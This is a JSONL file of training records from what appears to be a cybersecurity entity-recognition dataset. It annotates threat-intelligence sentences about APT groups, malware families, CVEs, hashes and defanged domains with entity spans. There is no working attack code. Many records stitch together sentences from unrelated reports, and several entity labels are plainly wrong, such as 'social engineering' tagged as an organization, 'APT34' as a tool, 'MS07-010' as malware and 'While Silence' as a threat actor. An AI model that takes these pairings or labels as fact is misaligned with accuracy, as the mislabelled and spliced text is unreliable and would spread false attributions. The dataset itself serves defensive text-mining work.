{"text": "If you follow the military analogy — those are the scouts . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" .", "spans": {"VULNERABILITY: CVE-2012-0158": [[126, 139]], "TOOL: NetTraveler Trojan": [[155, 173]], "ORGANIZATION: Symantec": [[195, 203]], "THREAT_ACTOR: attack groups": [[244, 257]], "THREAT_ACTOR: Cadelle": [[288, 295]], "THREAT_ACTOR: Chafer": [[300, 306]], "MALWARE: Backdoor.Cadelspy": [[332, 349]], "MALWARE: Backdoor.Remexi": [[354, 369]]}, "info": {"id": "cyberner_stix_train_005066", "source": "cyberner_stix_train"}}
{"text": "As mentioned above , the threat used to compromise the targeted networks is Poison Ivy , a Remote Access Tool ( RAT ) .", "spans": {"MALWARE: Poison Ivy": [[76, 86]]}, "info": {"id": "cyberner_stix_train_005067", "source": "cyberner_stix_train"}}
{"text": "FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT37": [[54, 59]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[72, 106]], "VULNERABILITY: CVE-2018-4878": [[109, 122]], "TOOL: DOGCALL malware": [[139, 154]], "MALWARE: Epic Turla": [[202, 212]], "ORGANIZATION: government institutions": [[291, 314]]}, "info": {"id": "cyberner_stix_train_005069", "source": "cyberner_stix_train"}}
{"text": "Recently , FireEye released a great report on one of the more active groups , now known as APT30 . The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools EternalRomance and EternalSynergy that were also released as part of the Shadow Brokers leak .", "spans": {"ORGANIZATION: FireEye": [[11, 18]], "THREAT_ACTOR: APT30": [[91, 96]], "SYSTEM: Windows": [[110, 117]], "VULNERABILITY: CVE-2017-0143": [[134, 147]], "VULNERABILITY: exploit": [[225, 232]], "VULNERABILITY: EternalRomance": [[239, 253]], "VULNERABILITY: EternalSynergy": [[258, 272]], "THREAT_ACTOR: Shadow Brokers": [[312, 326]]}, "info": {"id": "cyberner_stix_train_005070", "source": "cyberner_stix_train"}}
{"text": "They are mostly Western names , but there were some Arabic names in a few of the samples .", "spans": {}, "info": {"id": "cyberner_stix_train_005071", "source": "cyberner_stix_train"}}
{"text": "The compromised information was later leaked online .", "spans": {}, "info": {"id": "cyberner_stix_train_005072", "source": "cyberner_stix_train"}}
{"text": "In particular , DHS recommends that more research should be conducted on the North Korean cyber activity that has been reported by cybersecurity and threat research firms .", "spans": {"ORGANIZATION: DHS": [[16, 19]]}, "info": {"id": "cyberner_stix_train_005073", "source": "cyberner_stix_train"}}
{"text": "With the move to targeting select victims for high-value payouts , the INDRIK SPIDER adversary group is no longer forced to scale its operations , and now has the capacity to tailor its tooling to the victim 's environment and play a more active role in the compromise with \" hands on keyboard \" activity . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[71, 84]], "ORGANIZATION: diplomatic agency": [[333, 350], [378, 395]]}, "info": {"id": "cyberner_stix_train_005074", "source": "cyberner_stix_train"}}
{"text": "On April 27 , the attackers scanned the corporate internal network for hosts with ports 8080 , 5900 , and 40 open .", "spans": {}, "info": {"id": "cyberner_stix_train_005075", "source": "cyberner_stix_train"}}
{"text": "Gaza Cybergang Group 2 with the Micropsia backdoor :", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "MALWARE: Micropsia backdoor": [[32, 50]]}, "info": {"id": "cyberner_stix_train_005076", "source": "cyberner_stix_train"}}
{"text": "Just an hour and a half later they had compiled and delivered another AZZY x64 backdoor ( md5: 9D2F9E19DB8C20DC0D20D50869C7A373 , compiled August 4th , 2015 ) .", "spans": {"MALWARE: AZZY": [[70, 74]], "FILEPATH: 9D2F9E19DB8C20DC0D20D50869C7A373": [[95, 127]]}, "info": {"id": "cyberner_stix_train_005077", "source": "cyberner_stix_train"}}
{"text": "The nativesend method uses the Java Native Interface ( JNI ) to fetch and call the Android SMS API . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . CloseFW Switch off Windows Firewall . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": {"SYSTEM: Android": [[83, 90]], "THREAT_ACTOR: APT20": [[137, 142]], "VULNERABILITY: zero-day exploits": [[151, 168]], "SYSTEM: Windows": [[247, 254]]}, "info": {"id": "cyberner_stix_train_005078", "source": "cyberner_stix_train"}}
{"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: APT32’s": [[159, 166]], "THREAT_ACTOR: actor’s": [[205, 212]], "TOOL: emails": [[213, 219]], "FILEPATH: malicious payload": [[266, 283]], "ORGANIZATION: users": [[348, 353]]}, "info": {"id": "cyberner_stix_train_005079", "source": "cyberner_stix_train"}}
{"text": "His group configured the DCLeaks and Guccifer 2.0 blogs and social media accounts that would later be used to spread data stolen from the DNC , DCCC , and Clinton campaigns .", "spans": {"THREAT_ACTOR: DCLeaks": [[25, 32]], "THREAT_ACTOR: Guccifer": [[37, 45]], "TOOL: DNC": [[138, 141]], "TOOL: DCCC": [[144, 148]]}, "info": {"id": "cyberner_stix_train_005080", "source": "cyberner_stix_train"}}
{"text": "The group also creates and maintains scheduled tasks to achieve this purpose .", "spans": {}, "info": {"id": "cyberner_stix_train_005081", "source": "cyberner_stix_train"}}
{"text": "] infomavis-dracula [ . Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest . For example , “ shanghai ” is not a street name . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"TOOL: Infy message": [[67, 79]]}, "info": {"id": "cyberner_stix_train_005082", "source": "cyberner_stix_train"}}
{"text": "Flash exploit triggers CVE-2015-3043 , executes shellcode .", "spans": {"TOOL: Flash": [[0, 5]], "VULNERABILITY: CVE-2015-3043": [[23, 36]], "TOOL: shellcode": [[48, 57]]}, "info": {"id": "cyberner_stix_train_005083", "source": "cyberner_stix_train"}}
{"text": "PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . While investigating KerrDown we found multiple RAR files containing a variant of the malware .", "spans": {"ORGANIZATION: PwC UK": [[0, 6]], "ORGANIZATION: BAE Systems": [[11, 22]], "ORGANIZATION: industry": [[46, 54]], "ORGANIZATION: government": [[59, 69]], "FILEPATH: KerrDown": [[184, 192]]}, "info": {"id": "cyberner_stix_train_005084", "source": "cyberner_stix_train"}}
{"text": "It steals credentials from various FTP clients , Outlook , and Internet Explorer .", "spans": {"TOOL: Outlook": [[49, 56]], "TOOL: Internet Explorer": [[63, 80]]}, "info": {"id": "cyberner_stix_train_005085", "source": "cyberner_stix_train"}}
{"text": "Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere . APT Anchor Panda is a Chinese threat actor group who target maritime operations . S-TOOLwill recognize the outgoing connection as originated by the browser instead of the ZxShell service host process . Attackers send these emails to multiple accounts , hoping that someone will believe the story , and pay up .", "spans": {"SYSTEM: Play Store": [[85, 95]], "MALWARE: ZxShell": [[307, 314]]}, "info": {"id": "cyberner_stix_train_005086", "source": "cyberner_stix_train"}}
{"text": "The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we ’ ve seen before . Several additional documents surfaced between January 17 and February 3 . This allows an analyst to quickly check if there are any lost blocks by control flow unflattening . one base64 encoded string but multiple , separated by a character .", "spans": {"MALWARE: Android": [[8, 15], [89, 96]]}, "info": {"id": "cyberner_stix_train_005087", "source": "cyberner_stix_train"}}
{"text": "To facilitate lateral movement , the adversaries deploy ASPXTool web shells to internally accessible systems running IIS .", "spans": {"TOOL: ASPXTool": [[56, 64]], "TOOL: web shells": [[65, 75]], "TOOL: IIS": [[117, 120]]}, "info": {"id": "cyberner_stix_train_005088", "source": "cyberner_stix_train"}}
{"text": "All of the victims are located in Italy . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group . In fact , this is one of the first checks it performs when it is executed . Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": {"THREAT_ACTOR: threat group": [[202, 214]], "ORGANIZATION: Cisco Talos": [[293, 304]], "ORGANIZATION: U.S. Department of Health and Human Services ( HHS )": [[354, 406]], "MALWARE: Rhysida ransomware": [[445, 463]]}, "info": {"id": "cyberner_stix_train_005089", "source": "cyberner_stix_train"}}
{"text": "In addition , admin.nslookupdns [ . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"THREAT_ACTOR: APT41": [[36, 41]], "ORGANIZATION: social engineering": [[210, 228]], "THREAT_ACTOR: actor": [[258, 263]], "ORGANIZATION: diaspora": [[342, 350]], "ORGANIZATION: government employees": [[375, 395]]}, "info": {"id": "cyberner_stix_train_005090", "source": "cyberner_stix_train"}}
{"text": "Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": {"ORGANIZATION: Dragos": [[0, 6]]}, "info": {"id": "cyberner_stix_train_005091", "source": "cyberner_stix_train"}}
{"text": "Sets file creation timestamp to that of “ %SYSTEM%\\sfc.dll ” .", "spans": {"FILEPATH: %SYSTEM%\\sfc.dll": [[42, 58]]}, "info": {"id": "cyberner_stix_train_005092", "source": "cyberner_stix_train"}}
{"text": "In other words , TrickMo ’ s service will start either after the device becomes interactive or after a new SMS message is received . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls .", "spans": {"MALWARE: TrickMo": [[17, 24]], "MALWARE: Pony DLL": [[222, 230]], "MALWARE: Vawtrak": [[235, 242]], "TOOL: C2": [[397, 399]], "FILEPATH: XLS-withyourface.xls": [[471, 491]], "FILEPATH: XLS-withyourface – test.xls": [[496, 523]]}, "info": {"id": "cyberner_stix_train_005093", "source": "cyberner_stix_train"}}
{"text": "For the initial infection , PLATINUM typically sends malicious documents that contain exploits for vulnerabilities in various software programs , with links or remotely loaded components ( images or scripts or templates ) that are delivered to targets only once . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": {"THREAT_ACTOR: PLATINUM": [[28, 36]], "FILEPATH: exploit document": [[268, 284]], "MALWARE: KeyBoy": [[309, 315]], "FILEPATH: decoy document": [[342, 356]], "VULNERABILITY: exploit": [[399, 406]]}, "info": {"id": "cyberner_stix_train_005094", "source": "cyberner_stix_train"}}
{"text": "The source code for the malware powering this botnet was eventually leaked online .", "spans": {}, "info": {"id": "cyberner_stix_train_005095", "source": "cyberner_stix_train"}}
{"text": "Summary PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps . The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . APT18 . The web page “ JavaApplet.html ” loads “ JavaApplet.class ” that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": {"THREAT_ACTOR: PassCV group": [[110, 122]], "TOOL: publicly available RATs": [[142, 165]], "THREAT_ACTOR: APT18": [[318, 323]], "VULNERABILITY: CVE-2013 - 0422": [[459, 474]]}, "info": {"id": "cyberner_stix_train_005096", "source": "cyberner_stix_train"}}
{"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]]}, "info": {"id": "cyberner_stix_train_005097", "source": "cyberner_stix_train"}}
{"text": "The first function is used for contact information stealing : the function upCon steals all contacts in the contact list and their information . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . Honeybee appears to target humanitarian aid and inter-Korean affairs .", "spans": {"MALWARE: etool.exe": [[244, 253]], "VULNERABILITY: CVE-2017-0144": [[295, 308]], "MALWARE: MS07-010": [[334, 342]], "MALWARE: checker1.exe": [[343, 355]], "MALWARE: PsExec": [[440, 446]], "MALWARE: psexec.exe": [[467, 477]], "THREAT_ACTOR: Honeybee": [[480, 488]]}, "info": {"id": "cyberner_stix_train_005098", "source": "cyberner_stix_train"}}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . this library includes two drivers compiled on August 22 and September 4 , 2014 .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]]}, "info": {"id": "cyberner_stix_train_005099", "source": "cyberner_stix_train"}}
{"text": "Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . That said , the \" fingerprints \" left on the samples by the attackers – including techniques used to achieve unauthorized code execution – suggest that the BARIUM APT is behind the effort , according to the researchers .", "spans": {"VULNERABILITY: exploit": [[65, 72]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[81, 109]], "THREAT_ACTOR: BARIUM APT": [[268, 278]]}, "info": {"id": "cyberner_stix_train_005100", "source": "cyberner_stix_train"}}
{"text": "They pack the malware with a powerful commercial tool called Enigma Packer and implement language checks to ensure the victims are Arabic speaking .", "spans": {"TOOL: Enigma Packer": [[61, 74]]}, "info": {"id": "cyberner_stix_train_005101", "source": "cyberner_stix_train"}}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day exploits": [[144, 161]], "MALWARE: Lamberts": [[246, 254]], "MALWARE: Regin": [[290, 295]], "MALWARE: ProjectSauron": [[298, 311]], "MALWARE: Equation": [[314, 322]], "MALWARE: Duqu2": [[327, 332]]}, "info": {"id": "cyberner_stix_train_005102", "source": "cyberner_stix_train"}}
{"text": "Because the rootkit resides within a computer ’s flash memory , it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled .", "spans": {}, "info": {"id": "cyberner_stix_train_005103", "source": "cyberner_stix_train"}}
{"text": "Gustuff advertising screenshot The companies advertised in the image above were from Australia , which matches up with the campaign we researched . The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing . We are not able to calculate the total count of affected users based only on our data ; however , we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide . Network traffic and process related telemetry to / from host(s ) operating the MicroSCADA software .", "spans": {"MALWARE: Gustuff": [[0, 7]], "TOOL: EvilGrab": [[184, 192]], "TOOL: ChChes": [[203, 209]], "TOOL: RedLeaves": [[228, 237]]}, "info": {"id": "cyberner_stix_train_005104", "source": "cyberner_stix_train"}}
{"text": "Stealing SMS Figure 10 : Stealing SMS messages . It is noteworthy that the attackers never used the FuzzBunch framework in its attacks . The group uses custom malware as well as “ living off the land ” techniques .", "spans": {"THREAT_ACTOR: attackers": [[75, 84]], "TOOL: FuzzBunch framework": [[100, 119]]}, "info": {"id": "cyberner_stix_train_005105", "source": "cyberner_stix_train"}}
{"text": "Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's . CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": {"THREAT_ACTOR: Patchwork": [[171, 180]], "ORGANIZATION: CTU": [[186, 189]], "ORGANIZATION: U.S. defense": [[270, 282]], "ORGANIZATION: military capability": [[400, 419]]}, "info": {"id": "cyberner_stix_train_005106", "source": "cyberner_stix_train"}}
{"text": "The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9], [205, 210]]}, "info": {"id": "cyberner_stix_train_005107", "source": "cyberner_stix_train"}}
{"text": "In Asia there are numerous companies producing Android-based devices and Android apps , and many of them offer users their own app stores containing programs that can not be found in Google Play . This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . This executable is from HP and is usually installed with their printing and scanning software called “ HP Digital Imaging ” . So , instead of wasting time trying to figure out what is going on , I debugged the script using the browser .", "spans": {"SYSTEM: Android-based": [[47, 60]], "SYSTEM: Android": [[73, 80]], "SYSTEM: Google Play": [[183, 194]], "ORGANIZATION: HP": [[417, 419]], "TOOL: HP Digital Imaging": [[496, 514]], "TOOL: the browser": [[616, 627]]}, "info": {"id": "cyberner_stix_train_005108", "source": "cyberner_stix_train"}}
{"text": "In other words , the C2 server can specify the message contents to be sent , the time period in which to forward the voice call , and the recipients of outgoing messages . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . At the end , “ templates.vbs ” script will force the machine to reboot . PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": {"THREAT_ACTOR: BlackOasis": [[183, 193]], "FILEPATH: templates.vbs": [[398, 411]], "ORGANIZATION: PBI Research Services": [[456, 477]]}, "info": {"id": "cyberner_stix_train_005109", "source": "cyberner_stix_train"}}
{"text": "Coinminer.Linux.MALXMR.SMDSL64 : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 .", "spans": {"MALWARE: Coinminer.Linux.MALXMR.SMDSL64": [[0, 30]], "FILEPATH: 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79": [[33, 97]]}, "info": {"id": "cyberner_stix_train_005110", "source": "cyberner_stix_train"}}
{"text": "We have been monitoring the activities of this group and believe they are operating from China . Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools .", "spans": {"THREAT_ACTOR: group": [[47, 52]], "ORGANIZATION: Group-IB": [[97, 105]]}, "info": {"id": "cyberner_stix_train_005111", "source": "cyberner_stix_train"}}
{"text": "During 2016 , Symantec observed some overlap between the command and control ( C&C ) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe ( the U.S. government code name for APT28 and related actors ) , implying a potential connection between Earworm and APT28 .", "spans": {"ORGANIZATION: Symantec": [[14, 22]], "TOOL: command and control": [[57, 76]], "TOOL: C&C": [[79, 82], [124, 127]], "THREAT_ACTOR: Earworm": [[108, 115], [271, 278]], "THREAT_ACTOR: APT28": [[202, 207], [283, 288]]}, "info": {"id": "cyberner_stix_train_005112", "source": "cyberner_stix_train"}}
{"text": "Of note , the macro contained a DownloadFile() function that would use URLDownloadToFileA , but this was never actually used .", "spans": {}, "info": {"id": "cyberner_stix_train_005113", "source": "cyberner_stix_train"}}
{"text": "Indeed , due to its ability to hide it ’ s icon from the launcher and impersonates any popular existing apps on a device , there are endless possibilities for this sort of malware to harm a user ’ s device . The developers of Bookworm use these modules in a rather unique way , as the other embedded DLLs provide API functions for Leader to carry out its tasks . These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region . Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": {"TOOL: Bookworm": [[226, 234]], "TOOL: Leader": [[331, 337]], "VULNERABILITY: zero-day": [[428, 436]], "MALWARE: TrickBot": [[513, 521]], "SYSTEM: C2": [[573, 575]]}, "info": {"id": "cyberner_stix_train_005114", "source": "cyberner_stix_train"}}
{"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"TOOL: publicly available tools": [[47, 71]], "TOOL: Mimikatz": [[84, 92]], "TOOL: Hacktool.Mimikatz": [[95, 112]], "VULNERABILITY: CVE-2016-0051": [[206, 219]], "ORGANIZATION: Dell SecureWorks": [[247, 263]], "THREAT_ACTOR: Group-3390": [[304, 314]]}, "info": {"id": "cyberner_stix_train_005115", "source": "cyberner_stix_train"}}
{"text": "U.S. President Donald Trump has ordered ByteDance , the parent company of TikTok , to sell its U.S. TikTok assets and also issued executive orders that would ban the social media apps TikTok and WeChat from operating in the U.S. if the sale doesn ’ t happen in the next few weeks . The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti samples designed specifically for Linux .", "spans": {"ORGANIZATION: ByteDance": [[40, 49]], "SYSTEM: TikTok": [[74, 80], [100, 106], [184, 190]], "SYSTEM: WeChat": [[195, 201]], "THREAT_ACTOR: attack": [[286, 292]], "TOOL: TeamViewer": [[387, 397]], "MALWARE: Winnti": [[540, 546], [623, 629]], "ORGANIZATION: Vietnamese": [[562, 572]], "SYSTEM: Linux": [[664, 669]]}, "info": {"id": "cyberner_stix_train_005116", "source": "cyberner_stix_train"}}
{"text": "Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . this SWC was used to specifically target Turkish .", "spans": {"THREAT_ACTOR: Nitro": [[0, 5]], "ORGANIZATION: chemical sector": [[33, 48]]}, "info": {"id": "cyberner_stix_train_005117", "source": "cyberner_stix_train"}}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": {"TOOL: POWRUNER": [[0, 8]], "MALWARE: RTF file": [[41, 49]], "VULNERABILITY: CVE-2017-0199": [[65, 78]], "FILEPATH: Cyberlink": [[130, 139]], "TOOL: Dynamic Link Library": [[182, 202]]}, "info": {"id": "cyberner_stix_train_005118", "source": "cyberner_stix_train"}}
{"text": "There are two more reasons why Triada is so hard to detect and why it had impressed our researchers so much . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": {"MALWARE: Triada": [[31, 37]], "THREAT_ACTOR: ScarCruft": [[159, 168]], "VULNERABILITY: zero-day exploits": [[202, 219]], "ORGANIZATION: telecommunications": [[418, 436]], "ORGANIZATION: defense industries": [[441, 459]]}, "info": {"id": "cyberner_stix_train_005119", "source": "cyberner_stix_train"}}
{"text": "The name Spark is derived from the PDB path left in a few of the backdoor binaries :", "spans": {"MALWARE: Spark": [[9, 14]], "TOOL: PDB": [[35, 38]]}, "info": {"id": "cyberner_stix_train_005120", "source": "cyberner_stix_train"}}
{"text": "This allows the application to appear legitimate , especially given these applications icons and user interface . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": {"ORGANIZATION: FireEye": [[156, 163]], "ORGANIZATION: Advanced Practices": [[227, 245]], "TOOL: APT34": [[369, 374]], "THREAT_ACTOR: GCMAN group": [[381, 392]], "ORGANIZATION: banks": [[410, 415]], "ORGANIZATION: budgeting": [[441, 450]], "ORGANIZATION: accounting departments": [[455, 477]]}, "info": {"id": "cyberner_stix_train_005121", "source": "cyberner_stix_train"}}
{"text": "Or thirdly , the Dukes may have invested so much into these campaigns that by the time FireEye published their alert , the Dukes felt they could not afford to halt the campaigns .", "spans": {"THREAT_ACTOR: Dukes": [[17, 22], [123, 128]], "ORGANIZATION: FireEye": [[87, 94]]}, "info": {"id": "cyberner_stix_train_005122", "source": "cyberner_stix_train"}}
{"text": "Smishing : The Major Way To Distribute RuMMS We have not observed any instances of RuMMS on Google Play or other online app stores . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . By simply opening the SFX archive , it is possible to notice two different files that are shown below and named respectively “ 8957.cmd ” and “ 28847 ” . In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": {"MALWARE: RuMMS": [[39, 44], [83, 88]], "SYSTEM: Google Play": [[92, 103]], "ORGANIZATION: social engineering": [[161, 179]], "TOOL: remote administration tools": [[332, 359]], "TOOL: RATs": [[362, 366]], "ORGANIZATION: oil and gas": [[491, 502]], "TOOL: SFX archive": [[553, 564]], "FILEPATH: 8957.cmd": [[657, 665]], "FILEPATH: 28847": [[674, 679]], "ORGANIZATION: Hack520": [[715, 722]]}, "info": {"id": "cyberner_stix_train_005123", "source": "cyberner_stix_train"}}
{"text": "But before we go into the details of what the latest version of Rotexy can do and why it ’ s distinctive , we would like to give a summary of the path the Trojan has taken since 2014 up to the present day . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks .", "spans": {"MALWARE: Rotexy": [[64, 70]], "TOOL: Word document": [[227, 240]], "MALWARE: manual.doc": [[241, 251]], "THREAT_ACTOR: Honeybee": [[321, 329]], "THREAT_ACTOR: Lazarus group": [[332, 345]], "ORGANIZATION: financial institutions": [[427, 449]]}, "info": {"id": "cyberner_stix_train_005124", "source": "cyberner_stix_train"}}
{"text": "The extent of information that these kinds of threats can steal is also significant , as it lets attackers virtually take over a compromised device . While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide . While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019 , we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set . and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": {"THREAT_ACTOR: While Silence": [[150, 163]], "ORGANIZATION: banks": [[196, 201]], "ORGANIZATION: Group-IB": [[204, 212]], "THREAT_ACTOR: FIN7": [[511, 515]], "TOOL: OSX / Shlayer": [[606, 619]]}, "info": {"id": "cyberner_stix_train_005125", "source": "cyberner_stix_train"}}
{"text": "5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c APT10 actors gained initial access to the Visma network around August 17 , 2018 . HomamDownloader was discovered to be delivered by Tick via a spearphishing email .", "spans": {"SYSTEM: Adobe Flash Player": [[65, 83], [171, 189]], "THREAT_ACTOR: APT10": [[276, 281]], "TOOL: Visma network": [[318, 331]], "MALWARE: HomamDownloader": [[358, 373]], "THREAT_ACTOR: Tick": [[408, 412]], "TOOL: email": [[433, 438]]}, "info": {"id": "cyberner_stix_train_005126", "source": "cyberner_stix_train"}}
{"text": "Overall , Cerberus has a pretty common feature list and although the malware seems to have been written from scratch there does not seem to be any innovative functionality at this time . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"MALWARE: Cerberus": [[10, 18]], "MALWARE: Backdoor": [[187, 195]], "THREAT_ACTOR: REDBALDKNIGHT": [[311, 324]], "FILEPATH: decoy documents": [[405, 420]]}, "info": {"id": "cyberner_stix_train_005127", "source": "cyberner_stix_train"}}
